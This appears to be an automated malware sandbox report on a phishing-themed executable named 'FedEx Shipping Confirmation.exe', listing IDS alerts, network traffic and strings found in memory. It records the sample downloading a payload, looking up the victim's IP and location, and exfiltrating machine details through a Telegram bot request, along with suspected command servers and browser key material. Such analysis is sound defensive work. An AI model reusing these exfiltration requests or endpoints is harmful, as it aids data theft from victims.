Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2027/08/2024%20/%2012:04:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49795 -> 104.153.208.178:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49796 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49799 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49800 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49803 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49802 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49798 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49804 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49801 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49805 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET /SaOUJJyWvcSxh69.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: rabtbts.nlCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49797 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.165.48.74 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2027/08/2024%20/%2012:04:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SaOUJJyWvcSxh69.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: rabtbts.nlCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.00000000331E6000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",

Source: global traffic	DNS traffic detected: DNS query: rabtbts.nl
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 27 Aug 2024 16:05:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8130208151.0000000070541000.00000020.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8128175078.00000000356F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8128175078.00000000356F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: FedEx Shipping Confirmation.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8114126777.0000000002938000.00000004.00000020.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8114931843.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://rabtbts.nl/SaOUJJyWvcSxh69.bin
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8128175078.00000000356F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.office.com/office/url/setup
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.000000003318C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.000000003317D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en(
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033185000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eicar.org/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8128175078.00000000356F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B0000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FB5000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.com/setup
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.com/setupMicrosoft
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.165.48.74
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FD9000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FD9000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com;9
